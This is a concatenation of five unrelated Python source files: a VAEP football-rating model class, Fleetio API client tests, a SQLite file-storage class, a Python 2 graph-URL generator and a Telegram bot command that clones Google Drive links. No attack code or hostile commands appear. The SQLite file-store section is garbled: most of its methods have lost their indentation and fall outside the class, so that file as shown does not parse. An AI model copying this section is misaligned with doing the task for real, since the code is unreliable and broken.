            The SPADL representation of a single game.
        game_actions : pd.DataFrame
            The actions performed during `game` in the SPADL representation.

        Returns
        -------
        features : pd.DataFrame
            Returns the feature-based representation of each game state in the game.
        """
        game_actions_with_names = self._spadlcfg.add_names(game_actions)
        gamestates = self._fs.gamestates(game_actions_with_names, self.nb_prev_actions)
        # features are always computed as if the home team plays left to right
        gamestates = self._fs.play_left_to_right(gamestates, game.home_team_id)
        return pd.concat([fn(gamestates) for fn in self.xfns], axis=1)

    def compute_labels(
        self, game: pd.Series, game_actions: pd.DataFrame  # pylint: disable=W0613
    ) -> pd.DataFrame:
        """
        Compute the labels for each game state in the given game.

        Parameters
        ----------
        game : pd.Series
            The SPADL representation of a single game.
        game_actions : pd.DataFrame
            The actions performed during `game` in the SPADL representation.

        Returns
        -------
        labels : pd.DataFrame
            Returns the labels of each game state in the game.
        """
        game_actions_with_names = self._spadlcfg.add_names(game_actions)
        return pd.concat([fn(game_actions_with_names) for fn in self.yfns], axis=1)

    def _get_feature_columns(self, X: pd.DataFrame) -> List[str]:
        """Return the expected feature columns, raising if any are missing in X.

        Raises
        ------
        ValueError
            If one of the features is missing in the provided dataframe.
        """
        cols = self._fs.feature_column_names(self.xfns, self.nb_prev_actions)
        if not set(cols).issubset(set(X.columns)):
            missing_cols = ' and '.join(set(cols).difference(X.columns))
            raise ValueError('{} are not available in the features dataframe'.format(missing_cols))
        return cols

    def fit(
        self,
        X: pd.DataFrame,
        y: pd.DataFrame,
        learner: str = 'xgboost',
        val_size: float = 0.25,
        tree_params: Optional[Dict[str, Any]] = None,
        fit_params: Optional[Dict[str, Any]] = None,
    ) -> 'VAEP':
        """
        Fit the model according to the given training data.

        Parameters
        ----------
        X : pd.DataFrame
            Feature representation of the game states.
        y : pd.DataFrame
            Scoring and conceding labels for each game state.
        learner : string, default='xgboost'  # noqa: DAR103
            Gradient boosting implementation which should be used to learn the
            model. The supported learners are 'xgboost', 'catboost' and 'lightgbm'.
        val_size : float, default=0.25  # noqa: DAR103
            Percentage of the dataset that will be used as the validation set
            for early stopping. When zero, no validation data will be used.
        tree_params : dict
            Parameters passed to the constructor of the learner.
        fit_params : dict
            Parameters passed to the fit method of the learner.

        Raises
        ------
        ValueError
            If one of the features is missing in the provided dataframe.

        Returns
        -------
        self
            Fitted VAEP model.
        """
        nb_states = len(X)
        idx = np.random.permutation(nb_states)
        # Train/validation split point. BUGFIX: the previous implementation
        # started the validation slice at `split + 1`, silently dropping one
        # random sample from both sets.
        split = math.floor(nb_states * (1 - val_size))
        train_idx = idx[:split]
        val_idx = idx[split:]
        # filter feature columns (raises if any expected column is missing)
        cols = self._get_feature_columns(X)
        # split train and validation data
        X_train, y_train = X.iloc[train_idx][cols], y.iloc[train_idx]
        X_val, y_val = X.iloc[val_idx][cols], y.iloc[val_idx]
        # train one binary classifier F(X) = Y per label column
        for col in list(y.columns):
            eval_set = [(X_val, y_val[col])] if val_size > 0 else None
            if learner == 'xgboost':
                self.__models[col] = self._fit_xgboost(
                    X_train, y_train[col], eval_set, tree_params, fit_params
                )
            elif learner == 'catboost':
                self.__models[col] = self._fit_catboost(
                    X_train, y_train[col], eval_set, tree_params, fit_params
                )
            elif learner == 'lightgbm':
                self.__models[col] = self._fit_lightgbm(
                    X_train, y_train[col], eval_set, tree_params, fit_params
                )
            else:
                raise ValueError('A {} learner is not supported'.format(learner))
        return self

    def _fit_xgboost(
        self,
        X: pd.DataFrame,
        y: pd.Series,
        eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
        tree_params: Optional[Dict[str, Any]] = None,
        fit_params: Optional[Dict[str, Any]] = None,
    ) -> 'xgboost.XGBClassifier':
        """Train an XGBoost classifier, with early stopping when eval_set is given."""
        if xgboost is None:
            raise ImportError('xgboost is not installed.')
        # Default settings
        if tree_params is None:
            tree_params = dict(n_estimators=100, max_depth=3)
        if fit_params is None:
            fit_params = dict(eval_metric='auc', verbose=True)
        if eval_set is not None:
            val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
            fit_params = {**fit_params, **val_params}
        # Train the model
        model = xgboost.XGBClassifier(**tree_params)
        return model.fit(X, y, **fit_params)

    def _fit_catboost(
        self,
        X: pd.DataFrame,
        y: pd.Series,
        eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
        tree_params: Optional[Dict[str, Any]] = None,
        fit_params: Optional[Dict[str, Any]] = None,
    ) -> 'catboost.CatBoostClassifier':
        """Train a CatBoost classifier, with early stopping when eval_set is given."""
        if catboost is None:
            raise ImportError('catboost is not installed.')
        # Default settings
        if tree_params is None:
            tree_params = dict(eval_metric='BrierScore', loss_function='Logloss', iterations=100)
        if fit_params is None:
            # DataFrame.iteritems() was removed in pandas 2.0; items() is the
            # supported spelling (available since pandas 0.25)
            is_cat_feature = [c.dtype.name == 'category' for (_, c) in X.items()]
            fit_params = dict(
                cat_features=np.nonzero(is_cat_feature)[0].tolist(),
                verbose=True,
            )
        if eval_set is not None:
            val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
            fit_params = {**fit_params, **val_params}
        # Train the model
        model = catboost.CatBoostClassifier(**tree_params)
        return model.fit(X, y, **fit_params)

    def _fit_lightgbm(
        self,
        X: pd.DataFrame,
        y: pd.Series,
        eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
        tree_params: Optional[Dict[str, Any]] = None,
        fit_params: Optional[Dict[str, Any]] = None,
    ) -> 'lightgbm.LGBMClassifier':
        """Train a LightGBM classifier, with early stopping when eval_set is given."""
        if lightgbm is None:
            raise ImportError('lightgbm is not installed.')
        if tree_params is None:
            tree_params = dict(n_estimators=100, max_depth=3)
        if fit_params is None:
            fit_params = dict(eval_metric='auc', verbose=True)
        if eval_set is not None:
            val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
            fit_params = {**fit_params, **val_params}
        # Train the model
        model = lightgbm.LGBMClassifier(**tree_params)
        return model.fit(X, y, **fit_params)

    def _estimate_probabilities(self, X: pd.DataFrame) -> pd.DataFrame:
        """Predict P(scores) and P(concedes) for each game state in X."""
        # filter feature columns (raises if any expected column is missing)
        cols = self._get_feature_columns(X)
        Y_hat = pd.DataFrame()
        for col in self.__models:
            # predict_proba returns an (n, 2) array; column 1 is P(label == 1)
            Y_hat[col] = self.__models[col].predict_proba(X[cols])[:, 1]
        return Y_hat

    def rate(
        self, game: pd.Series, game_actions: pd.DataFrame, game_states: Optional[pd.DataFrame] = None
    ) -> pd.DataFrame:
        """
        Compute the VAEP rating for the given game states.

        Parameters
        ----------
        game : pd.Series
            The SPADL representation of a single game.
        game_actions : pd.DataFrame
            The actions performed during `game` in the SPADL representation.
        game_states : pd.DataFrame, default=None
            DataFrame with the game state representation of each action. If
            `None`, these will be computed on-the-fly.

        Raises
        ------
        NotFittedError
            If the model is not fitted yet.

        Returns
        -------
        ratings : pd.DataFrame
            Returns the VAEP rating for each given action, as well as the
            offensive and defensive value of each action.
        """
        if not self.__models:
            raise NotFittedError()
        game_actions_with_names = self._spadlcfg.add_names(game_actions)
        if game_states is None:
            game_states = self.compute_features(game, game_actions)
        y_hat = self._estimate_probabilities(game_states)
        p_scores, p_concedes = y_hat.scores, y_hat.concedes
        vaep_values = self._vaep.value(game_actions_with_names, p_scores, p_concedes)
        return vaep_values

    def score(self, X: pd.DataFrame, y: pd.DataFrame) -> Dict[str, Dict[str, float]]:
        """Evaluate the fit of the model on the given test data and labels.

        Parameters
        ----------
        X : pd.DataFrame
            Feature representation of the game states.
        y : pd.DataFrame
            Scoring and conceding labels for each game state.

        Raises
        ------
        NotFittedError
            If the model is not fitted yet.

        Returns
        -------
        score : dict
            The Brier and AUROC scores for both binary classification problems.
        """
        if not self.__models:
            raise NotFittedError()
        y_hat = self._estimate_probabilities(X)
        scores: Dict[str, Dict[str, float]] = {}
        for col in self.__models:
            scores[col] = {}
            scores[col]['brier'] = brier_score_loss(y[col], y_hat[col])
            scores[col]['auroc'] = roc_auc_score(y[col], y_hat[col])
        return scores
|
import os
import pytest
from datetime import date
import time
from fleetio.fleetio import Fleetio
from fleetio.request import Request, RequestPurchaseOrderID, RequestEquipmentID, RequestVehicleID
# date stamp available to tests that need uniquely named records
today = date.today().strftime("%m_%d_%Y")
# credentials come from the environment; os.environ.get returns None when a
# variable is unset, in which case authenticated API calls would fail
api_key = os.environ.get('FLEETIO_API_KEY')
account_token = os.environ.get('FLEETIO_ACCOUNT_TOKEN')
# shared client instance used by the tests in this module
f = Fleetio(api_key, account_token)
def test_request():
    """Request accepts at most two paths; a third path must raise ValueError."""
    with pytest.raises(ValueError):
        Request('', '', ['/hello', '/hello/:id', '/hellotoomuch'])
    # Valid configurations must construct without raising. The previous
    # try/except with a bare `except: assert False` swallowed the actual
    # exception; letting it propagate gives pytest a useful traceback.
    Request('', '', ['/hello', '/hello/:id'])
    Request('', '', ['/hello'])
    Request('', '', '/hello')
    Request('', '', '')
def test_request_path_selector():
    """_path_selector prefers the ':id' variant when an id is supplied."""
    variants = ['/hello', '/hello/:id']
    assert Request._path_selector(variants, '123') == '/hello/:id'
    # a single string path is returned unchanged regardless of the id
    assert Request._path_selector('/hello', '123') == '/hello'
    # without an id, the non-parameterised variant is chosen
    assert Request._path_selector(variants, None) == '/hello'
def test_request_url_id_setter():
    """_url_id_setter substitutes ':id' with the id; plain paths are untouched."""
    assert Request._url_id_setter('/hello/:id', '123') == '/hello/123'
    assert Request._url_id_setter('/hello', '123') == '/hello'
def test_request_clean_params():
    """_clean_params parses 'k=v, k=v' strings and passes dicts through unchanged."""
    expected = {'name': 'Fleetio', 'vehicle': '123'}
    assert Request._clean_params('name=Fleetio, vehicle=123') == expected
    assert Request._clean_params(expected) == expected
def test_RequestPurchaseOrderID():
    """RequestPurchaseOrderID accepts at most two paths; a third raises ValueError."""
    with pytest.raises(ValueError):
        RequestPurchaseOrderID('', '', ['/hello', '/hello/:number', '/hellotoomuch'])
    # Valid configurations must construct without raising. The previous
    # try/except with a bare `except: assert False` swallowed the actual
    # exception; letting it propagate gives pytest a useful traceback.
    RequestPurchaseOrderID('', '', ['/hello', '/hello/:number'])
    RequestPurchaseOrderID('', '', ['/hello'])
    RequestPurchaseOrderID('', '', '/hello')
    RequestPurchaseOrderID('', '', '')
def test_RequestPurchaseOrderID_path_selector():
    """_path_selector prefers the ':number' variant when an id is supplied."""
    variants = ['/hello', '/hello/:number']
    assert RequestPurchaseOrderID._path_selector(variants, '123') == '/hello/:number'
    # a single string path is returned unchanged regardless of the id
    assert RequestPurchaseOrderID._path_selector('/hello', '123') == '/hello'
    # without an id, the non-parameterised variant is chosen
    assert RequestPurchaseOrderID._path_selector(variants, None) == '/hello'
def test_RequestPurchaseOrderID_url_id_setter():
    """_url_id_setter substitutes ':number' with the id; plain paths are untouched."""
    assert RequestPurchaseOrderID._url_id_setter('/hello/:number', '123') == '/hello/123'
    assert RequestPurchaseOrderID._url_id_setter('/hello', '123') == '/hello'
def test_RequestPurchaseOrderID_clean_params():
    """_clean_params parses 'k=v, k=v' strings and passes dicts through unchanged."""
    expected = {'name': 'Fleetio', 'vehicle': '123'}
    assert RequestPurchaseOrderID._clean_params('name=Fleetio, vehicle=123') == expected
    assert RequestPurchaseOrderID._clean_params(expected) == expected
def test_RequestVehicleID():
    """RequestVehicleID accepts at most two paths; a third raises ValueError."""
    with pytest.raises(ValueError):
        RequestVehicleID('', '', ['/hello', '/hello/:vehicle_id', '/hellotoomuch'])
    # Valid configurations must construct without raising. The previous
    # try/except with a bare `except: assert False` swallowed the actual
    # exception; letting it propagate gives pytest a useful traceback.
    RequestVehicleID('', '', ['/hello', '/hello/:vehicle_id'])
    RequestVehicleID('', '', ['/hello'])
    RequestVehicleID('', '', '/hello')
    RequestVehicleID('', '', '')
def test_RequestVehicleID_path_selector():
    """_path_selector prefers the ':vehicle_id' variant when an id is supplied."""
    variants = ['/hello', '/hello/:vehicle_id']
    assert RequestVehicleID._path_selector(variants, '123') == '/hello/:vehicle_id'
    # a single string path is returned unchanged regardless of the id
    assert RequestVehicleID._path_selector('/hello', '123') == '/hello'
    # without an id, the non-parameterised variant is chosen
    assert RequestVehicleID._path_selector(variants, None) == '/hello'
def test_RequestVehicleID_url_id_setter():
    """_url_id_setter substitutes ':vehicle_id' with the id; plain paths are untouched."""
    assert RequestVehicleID._url_id_setter('/hello/:vehicle_id', '123') == '/hello/123'
    assert RequestVehicleID._url_id_setter('/hello', '123') == '/hello'
def test_RequestVehicleID_clean_params():
    """_clean_params parses 'k=v, k=v' strings and passes dicts through unchanged."""
    expected = {'name': 'Fleetio', 'vehicle': '123'}
    assert RequestVehicleID._clean_params('name=Fleetio, vehicle=123') == expected
    assert RequestVehicleID._clean_params(expected) == expected
def test_RequestEquipmentID():
    """RequestEquipmentID accepts at most two paths; a third raises ValueError."""
    with pytest.raises(ValueError):
        RequestEquipmentID('', '', ['/hello', '/hello/:equipment_id', '/hellotoomuch'])
    # Valid configurations must construct without raising. The previous
    # try/except with a bare `except: assert False` swallowed the actual
    # exception; letting it propagate gives pytest a useful traceback.
    RequestEquipmentID('', '', ['/hello', '/hello/:equipment_id'])
    RequestEquipmentID('', '', ['/hello'])
    RequestEquipmentID('', '', '/hello')
    RequestEquipmentID('', '', '')
def test_RequestEquipmentID_path_selector():
    """_path_selector prefers the ':equipment_id' variant when an id is supplied."""
    variants = ['/hello', '/hello/:equipment_id']
    assert RequestEquipmentID._path_selector(variants, '123') == '/hello/:equipment_id'
    # a single string path is returned unchanged regardless of the id
    assert RequestEquipmentID._path_selector('/hello', '123') == '/hello'
    # without an id, the non-parameterised variant is chosen
    assert RequestEquipmentID._path_selector(variants, None) == '/hello'
def test_RequestEquipmentID_url_id_setter():
    """_url_id_setter substitutes ':equipment_id' with the id; plain paths are untouched."""
    assert RequestEquipmentID._url_id_setter('/hello/:equipment_id', '123') == '/hello/123'
    assert RequestEquipmentID._url_id_setter('/hello', '123') == '/hello'
def test_RequestEquipmentID_clean_params():
    """_clean_params parses 'k=v, k=v' strings and passes dicts through unchanged."""
    expected = {'name': 'Fleetio', 'vehicle': '123'}
    assert RequestEquipmentID._clean_params('name=Fleetio, vehicle=123') == expected
    assert RequestEquipmentID._clean_params(expected) == expected
|
<gh_stars>0
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
#
# Copyright (C) <NAME> 2019
#
import sqlite3
from FileTools import *
class FileServerDatabase:
    """SQLite-backed store for files plus their MD5/SHA1 hashes and metadata."""
    # class-level defaults; __init__ replaces them on each instance
    # NOTE(review): ":memory" is not SQLite's in-memory database name (that is
    #   ":memory:"); harmless here because __init__ overwrites it with
    #   "fileStore.db", but worth fixing if this default is ever used.
    _databaseFile = ":memory"
    _connection = None
    _cursor = None
    def __init__(self):
        """Open (or create) fileStore.db and attach it under the alias 'FileStore'."""
        self._databaseFile = "fileStore.db"
        self._connection = sqlite3.connect(self._databaseFile)
        c = self._connection.cursor()
        # NOTE(review): this attaches the already-open database file to itself
        #   under a second schema name; all queries in this class use the main
        #   schema, so the alias appears unused -- confirm before removing.
        c.execute("ATTACH DATABASE '%s' AS 'FileStore';" % (self._databaseFile))
        self._connection.commit()
def __del__(self):
self._connection.close()
def _createFilesTable(self):
c = self._connection.cursor()
try:
c.execute("SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'files';")
except:
c.execute("""CREATE TABLE `files`(
`files_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`fileMD5_id` INTEGER,
`fileSHA1_id` INTEGER,
`fileDetails_id` INTEGER,
`fileContent_id` INTEGER
);""")
self._connection.commit()
def _createFileMD5Table(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileMD5';""")
except:
c.execute("""CREATE TABLE `fileMD5`(
`fileMD5_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`MD5Hash` TEXT UNIQUE
);""")
self._connection.commit()
def _createFileSHA1Table(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileSHA1';""")
except:
c.execute("""CREATE TABLE `fileSHA1`(
`fileSHA1_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`SHA1Hash` TEXT UNIQUE
);""")
self._connection.commit()
def _createFileDetailsTable(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileDetails';""")
except:
c.execute("""CREATE TABLE `fileDetails`(
`fileDetails_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`fileName` TEXT,
`fileDescription` TEXT,
`fileSize` INTEGER
);""")
self._connection.commit()
def _createFileContentTable(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileContent';""")
except:
c.execute("""CREATE TABLE `fileContent`(
`fileContent_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`fileBlob` BLOB
);""")
self._connection.commit()
def createDatabaseTables(self):
self._createFilesTable()
self._createFileMD5Table()
self._createFileSHA1Table()
self._createFileContentTable()
self._createFileDetailsTable()
def deleteDatabaseTables(self):
c = self._connection.cursor()
c.execute("DROP TABLE files;")
c.execute("DROP TABLE fileMD5;")
c.execute("DROP TABLE fileSHA1;")
c.execute("DROP TABLE fileDetails;")
c.execute("DROP TABLE fileContent;")
self._connection.commit()
    def getFileContentFromName(self, fileName):
        """Return the stored BLOB content for every file named `fileName`.

        :param fileName: value of fileDetails.fileName to look up
        :return: list of (fileBlob,) row tuples; empty list if no match
        """
        c = self._connection.cursor()
        c.execute("""SELECT fileBlob FROM files
            INNER JOIN fileContent ON fileContent.files_id = files.files_id
            INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
            WHERE fileName = :fileName;""", {"fileName": fileName})
        return c.fetchall()
    def getFileMD5FromName(self, fileName):
        """Return the stored MD5 hash for every file named `fileName`.

        :param fileName: value of fileDetails.fileName to look up
        :return: list of (MD5Hash,) row tuples; empty list if no match
        """
        c = self._connection.cursor()
        c.execute("""SELECT MD5Hash FROM files
            INNER JOIN fileContent ON fileContent.files_id = files.files_id
            INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
            INNER JOIN fileMD5 on fileMD5.files_id = fileDetails.files_id
            WHERE fileName = :fileName;""", {"fileName": fileName})
        return c.fetchall()
    def getFileSHA1FromName(self, fileName):
        """Return the stored SHA1 hash for every file named `fileName`.

        :param fileName: value of fileDetails.fileName to look up
        :return: list of (SHA1Hash,) row tuples; empty list if no match
        """
        c = self._connection.cursor()
        c.execute("""SELECT SHA1Hash FROM files
            INNER JOIN fileContent ON fileContent.files_id = files.files_id
            INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
            INNER JOIN fileSHA1 on fileSHA1.files_id = fileDetails.files_id
            WHERE fileName = :fileName;""", {"fileName": fileName})
        return c.fetchall()
def insertFile(self, fileName):
    """Read *fileName* and insert its bytes plus MD5/SHA1 hashes.

    Returns True on success and also when the file is already present
    (sqlite3.IntegrityError -> rollback).  Any other failure is rolled back
    and re-raised.
    """
    try:
        # Context manager guarantees the handle is closed even if read fails.
        with open(fileName, "rb") as f:
            data = f.read()
        c = self._connection.cursor()
        c.execute("INSERT INTO fileDetails (fileName) VALUES (:name);", {"name": fileName})
        # cursor.lastrowid is the rowid of the INSERT just issued on this
        # cursor; unlike "SELECT id ... ORDER BY id DESC" it cannot race
        # with concurrent writers.
        details_id = c.lastrowid
        # qmark placeholder matches the positional tuple (the old statement
        # bound a positional tuple to a named :data placeholder).
        c.execute("INSERT INTO fileContent (fileBlob) VALUES (?)", (sqlite3.Binary(data),))
        content_id = c.lastrowid
        c.execute("INSERT INTO files (fileDetails_id, fileContent_id) VALUES (:details_id, :content);",
                  {"details_id": details_id, "content": content_id})
        files_id = c.lastrowid
        # Back-fill the files_id foreign keys now that the files row exists.
        c.execute("UPDATE fileDetails SET files_id = :files_id WHERE fileDetails_id = :fileDetails_id;",
                  {"files_id": files_id, "fileDetails_id": details_id})
        c.execute("UPDATE fileContent SET files_id = :files_id WHERE fileContent_id = :fileContent_id;",
                  {"files_id": files_id, "fileContent_id": content_id})
        md5sum = generateMd5Hash(data)
        c.execute("INSERT INTO fileMD5 (files_id, MD5Hash) VALUES (:files_id, :md5);",
                  {"files_id": files_id, "md5": md5sum})
        md5_id = c.lastrowid
        sha1sum = generateSha1Hash(data)
        c.execute("INSERT INTO fileSHA1 (files_id, SHA1Hash) VALUES (:files_id, :sha1);",
                  {"files_id": files_id, "sha1": sha1sum})
        sha1_id = c.lastrowid
        c.execute("UPDATE files SET fileMD5_id = :md5 WHERE files_id = :files_id;",
                  {"md5": md5_id, "files_id": files_id})
        c.execute("UPDATE files SET fileSHA1_id = :sha1 WHERE files_id = :files_id;",
                  {"sha1": sha1_id, "files_id": files_id})
        self._connection.commit()
        return True
    except sqlite3.IntegrityError:
        print("File already in DB")
        self._connection.rollback()
        return True
    except Exception as e:
        print(str(e))
        self._connection.rollback()
        raise e
#def getDetailsFromFileName(self, fileName):
|
<filename>rrd/utils/graph_urls.py
#-*- coding:utf-8 -*-
# Copyright 2017 Xiaomi, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import copy
import re
from rrd import config
from rrd.model.tmpgraph import TmpGraph
from rrd.model.endpoint import Endpoint, EndpointCounter
from rrd.config import today_date_str
def generate_graph_urls(graph, start, end):
    """Expand a dashboard graph config into concrete chart graphs.

    Resolves graph.hosts to endpoint ids, expands every
    'metric=... tag=...' counter query against those endpoints, then
    delegates URL building to _generate_graph_urls().  Returns [] whenever
    any required piece (counters, hosts, endpoint rows) is missing.
    """
    print today_date_str(),"generate_graph_urls_start",graph.counters
    counters = graph.counters or []
    if not counters:
        return []
    endpoint_list = graph.hosts or []
    if not endpoint_list:
        return []
    endpoint_objs = Endpoint.gets_by_endpoint(endpoint_list)
    print today_date_str(),"generate_graph_urls_endpoint_objs"
    if not endpoint_objs:
        return []
    endpoint_ids = [x.id for x in endpoint_objs]
    counters = []
    print today_date_str(), len(graph.counters)
    for c in graph.counters:
        print today_date_str(),"c",c
        if c.find("metric=") == -1:
            # Plain counter string: use it verbatim.
            counters.append(c)
        else:
            # Query form: split into the metric term ('metric=x' becomes
            # '^x', an anchored prefix for the search backend) and tag terms.
            metric=""
            tags = []
            qs = []
            c = c.strip()
            for q in c.split():
                q = q.strip()
                if q.startswith("metric="):
                    metric = q.replace("metric=", "^", 1)
                    qs.append(metric)
                else:
                    qs.append(q)
                    tags.append(q)
            print "counter_objs_start"
            counter_objs = EndpointCounter.search_in_endpoint_ids(qs, endpoint_ids[:], limit=100)
            print "counter_objs",counter_objs
            if not counter_objs:
                continue
            for co in counter_objs:
                # Keep only counters whose name starts with the metric and
                # whose tag section contains every requested tag.
                if not re.search('^%s(/|$)' %metric, co.counter):
                    continue
                matched = True
                for tag in tags:
                    if not re.search('(/|,)%s(,|$)' %tag, co.counter):
                        matched = False
                        break
                if not matched:
                    continue
                counters.append(co.counter)
    if not counters:
        return []
    # De-duplicate and keep output order deterministic.
    counters = sorted(list(set(counters)))
    return _generate_graph_urls(graph, counters, endpoint_list, start, end)
def _generate_graph_urls(graph, counters, endpoint_list, start, end):
    """Create TmpGraph records and chart src URLs for an expanded graph.

    graph_type 'h': one chart per counter over all endpoints.
    graph_type 'k': one chart per endpoint over all counters.
    otherwise    : a single combined chart.
    When `start` is falsy it defaults to "now minus graph.timespan".
    """
    print today_date_str(),"_generate_graph_urls_start"
    ret_graphs = []
    print today_date_str(),"graph.graph_type",graph.graph_type
    if graph.graph_type == 'h':
        for c in counters:
            print today_date_str(), "tmp_graph_id_start"
            tmp_graph_id = TmpGraph.add(endpoint_list, [c,])
            if not tmp_graph_id:
                break
            new_g = copy.deepcopy(graph)
            new_g.counters = c
            if end:
                new_g.src = '''/chart/h?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
            else:
                new_g.src = '''/chart/h?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
            # SUM is a dedicated flag; any other method is a consolidation fn.
            if graph.method == 'SUM':
                new_g.src += "&sum=on"
            else:
                new_g.src += "&cf=%s" %graph.method
            ret_graphs.append(new_g)
    elif graph.graph_type=='k':
        for e in endpoint_list:
            tmp_graph_id = TmpGraph.add([e,], counters)
            if not tmp_graph_id:
                break
            new_g = copy.deepcopy(graph)
            new_g.hosts = e
            if end:
                new_g.src = '''/chart/k?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
            else:
                new_g.src = '''/chart/k?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
            if graph.method == 'SUM':
                new_g.src += "&sum=on"
            else:
                new_g.src += "&cf=%s" %graph.method
            ret_graphs.append(new_g)
    else:
        # Combined view: all endpoints and counters in one chart.
        tmp_graph_id = TmpGraph.add(endpoint_list, counters)
        if not tmp_graph_id:
            return []
        new_g = copy.deepcopy(graph)
        if end:
            new_g.src = '''/chart/a?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
        else:
            new_g.src = '''/chart/a?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
        if graph.method == 'SUM':
            new_g.src += "&sum=on"
        else:
            new_g.src += "&cf=%s" %graph.method
        ret_graphs.append(new_g)
    return ret_graphs
|
import random
import string
from telegram.ext import CommandHandler
from bot.helper.mirror_utils.upload_utils.gdriveTools import GoogleDriveHelper
from bot.helper.telegram_helper.message_utils import sendMessage, sendMarkup, deleteMessage, delete_all_messages, update_all_messages, sendStatusMessage
from bot.helper.telegram_helper.filters import CustomFilters
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot.helper.mirror_utils.status_utils.clone_status import CloneStatus
from bot import dispatcher, LOGGER, CLONE_LIMIT, STOP_DUPLICATE, download_dict, download_dict_lock, Interval
from bot.helper.ext_utils.bot_utils import get_readable_file_size, is_gdrive_link, is_gdtot_link, new_thread
from bot.helper.mirror_utils.download_utils.direct_link_generator import gdtot
from bot.helper.ext_utils.exceptions import DirectDownloadLinkException
@new_thread
def cloneNode(update, context):
    """/clone handler: copy a Google Drive (or gdtot) link into the bot's Drive.

    Runs on its own thread (@new_thread).  The link comes either from the
    command argument or from the replied-to message; `tag` identifies the
    requesting user in replies.
    """
    args = update.message.text.split(" ", maxsplit=1)
    reply_to = update.message.reply_to_message
    link = ''
    if len(args) > 1:
        link = args[1]
    if update.message.from_user.username:
        tag = f"@{update.message.from_user.username}"
    else:
        tag = update.message.from_user.mention_html(update.message.from_user.first_name)
    if reply_to is not None:
        # A reply overrides both the link (if none was given) and the tag.
        if len(link) == 0:
            link = reply_to.text
        if reply_to.from_user.username:
            tag = f"@{reply_to.from_user.username}"
        else:
            tag = reply_to.from_user.mention_html(reply_to.from_user.first_name)
    is_gdtot = is_gdtot_link(link)
    if is_gdtot:
        # gdtot links must first be resolved to a direct Drive link.
        try:
            msg = sendMessage(f"Processing: <code>{link}</code>", context.bot, update.message)
            link = gdtot(link)
            deleteMessage(context.bot, msg)
        except DirectDownloadLinkException as e:
            deleteMessage(context.bot, msg)
            return sendMessage(str(e), context.bot, update.message)
    if is_gdrive_link(link):
        gd = GoogleDriveHelper()
        res, size, name, files = gd.helper(link)
        if res != "":
            return sendMessage(res, context.bot, update.message)
        if STOP_DUPLICATE:
            # Abort early if an identically named item already exists.
            LOGGER.info('Checking File/Folder if already in Drive...')
            smsg, button = gd.drive_list(name, True, True)
            if smsg:
                msg3 = "File/Folder is already available in Drive.\nHere are the search results:"
                return sendMarkup(msg3, context.bot, update.message, button)
        if CLONE_LIMIT is not None:
            LOGGER.info('Checking File/Folder Size...')
            if size > CLONE_LIMIT * 1024**3:
                msg2 = f'Failed, Clone limit is {CLONE_LIMIT}GB.\nYour File/Folder size is {get_readable_file_size(size)}.'
                return sendMessage(msg2, context.bot, update.message)
        if files <= 20:
            # Small transfer: clone synchronously behind a temporary message.
            msg = sendMessage(f"Cloning: <code>{link}</code>", context.bot, update.message)
            result, button = gd.clone(link)
            deleteMessage(context.bot, msg)
        else:
            # Large transfer: register a CloneStatus entry so progress shows
            # in the shared status view; download_dict is guarded by its lock.
            drive = GoogleDriveHelper(name)
            gid = ''.join(random.SystemRandom().choices(string.ascii_letters + string.digits, k=12))
            clone_status = CloneStatus(drive, size, update.message, gid)
            with download_dict_lock:
                download_dict[update.message.message_id] = clone_status
            sendStatusMessage(update.message, context.bot)
            result, button = drive.clone(link)
            with download_dict_lock:
                del download_dict[update.message.message_id]
                count = len(download_dict)
            try:
                # Last active transfer: stop the status refresher and clean up.
                if count == 0:
                    Interval[0].cancel()
                    del Interval[0]
                    delete_all_messages()
                else:
                    update_all_messages()
            except IndexError:
                pass
        cc = f'\n\n<b>cc: </b>{tag}'
        if button in ["cancelled", ""]:
            sendMessage(f"{tag} {result}", context.bot, update.message)
        else:
            sendMarkup(result + cc, context.bot, update.message, button)
        if is_gdtot:
            # Remove the temporary file gdtot created during link resolution.
            gd.deletefile(link)
    else:
        sendMessage('Send Gdrive or gdtot link along with command or by replying to the link by command', context.bot, update.message)
# Register /clone for authorized chats/users only; the handler itself runs
# asynchronously via run_async (on top of its own @new_thread).
